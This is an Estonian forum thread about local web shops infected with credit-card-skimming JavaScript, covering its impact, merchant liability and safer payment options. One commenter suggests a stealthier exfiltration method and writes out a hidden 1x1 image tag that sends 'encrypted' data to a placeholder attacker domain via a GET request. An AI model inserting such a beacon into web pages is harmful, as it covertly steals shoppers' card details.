[Tanel]

Zone.ee IT arhitekt Andris Reinman vaatles ühe häkitud veebipoe näitel, kuidas pahavara klientide krediitkaardi andmeid varastab. Kas ja kui suur probleem see kohalike veebipoodide jaoks üldse on?

Ilmselt ei jäänud kellelgi märkamata eelmise nädala uudis pahavaraga nakatunud ja seetõttu krediitkaardi andmeid varastavate kohalike veebipoodide kohta. Probleem on reaalne, veebipoed olid tõepoolest nakatunud krediitkaardinumbreid varastava pahavaraga, samas võimalik kahju – vähemalt kohalike veebipoodide klientide jaoks – on tõenäoliselt väike või täiesti olematu.

Et aru saada, milles üldse küsimus, võtame näitena ühe tuntud veebipoe, mis nakatus selle aasta veebruari alguses ja oli seda kuni eelmise nädalani. Mõne turvaaugu kaudu (tõenäoliselt shoplift) oli lisatud veebipoe templiidifaili JavaScripti koodiblokk, mis tõmmati seeläbi käima igal lehevaatamisel. Vaatamegi nüüd, et mida see konkreetne kood siis selles veebipoes teha üritas.

Loe edasi: https://www.zone.ee/blogi/2016/10/16/tuntud-veebipoode-nakatanud-pahavara-luubi/

[LKits]

Kuidas kohalike klientide jaoks kahju võike või olematu on?
Mustal turul müüakse krediitkaardiandmeid 10€+ / tk ning siis saadakse jõhkralt edasi toimetada (sularaha välja võtta, tehinguid teha jne).

Mis värk siis on? Pätšitakse ära, ajutiselt sulgetakse või mida? Tegemist on lausa majandusliku turvariskiga, kuhu peaks veebimajutaja ja/või riik sekkuma, et ei jätkuks krediitkaardi andmete vargusi.

EDIT: Scripti kohapealt, eriti lollid on ikka need "häkkerid". Miks peaks kasutama POST andmete edastamise meetodit, kui saab ilusasti kohapeal andmed ära "krüpteerida" ning suvalise GET stringina päring teha, näiteks pildi näol.

<img src="http://pahategelasedomeen.com/data?q=krüpteeritudandmedmidaedastada" height="1" width="1" style="display: none;"></img>

[-vodafone-]

Riik peaks sekkuma teavitustööga, mis teadvustab inimesi alternatiividest nagu PayPal jt. ning nende alternatiivsete maksemoodulite 2way autentimise võimalustest. Igaühel kellel on krediitkaart ja sooritab selle numbreid kuskil veebipoes sisestades makseid peaks olema niipalju taipu, et teha endale näiteks PayPal ja lisada 2 astmeline autentimine. Ja kui e-poel ei ole krediitkaardi maksele alternatiivi siis jäta ost sooritamata.

[LKits]

Ega selle krediitkaardi andmete vargusega olegi, et raha tõenäoliselt pikas perspektiivis kaduma ei lähe, aga igavene peavalu, sest peab hakkama taidlema, et varastatud andmetega ostja pole ikkagi sina ise ja raha kantakse sel juhul tagasi ja vastutab kaupmees, kes andmed aksepteeris jne.

Krediitkaardiga maksmisel peab kaupmees teostama isikutuvastuse ning kui ostjaks pole kaardi omanik, siis vastutab kaupmees. Aga no on seda peavalu vaja... ning oh seda mainekahjut, kui välja "reklaamida" need e-poed, mis pahavaraga nakatunud.

[netcat]

Paistab, et see mainekahju ei huvita eriti kedagi, kui nädal peale avalikustamist endiselt on väga tuntud veebikauplused endiselt haavatavad ja kõik on asjaga väga rahul.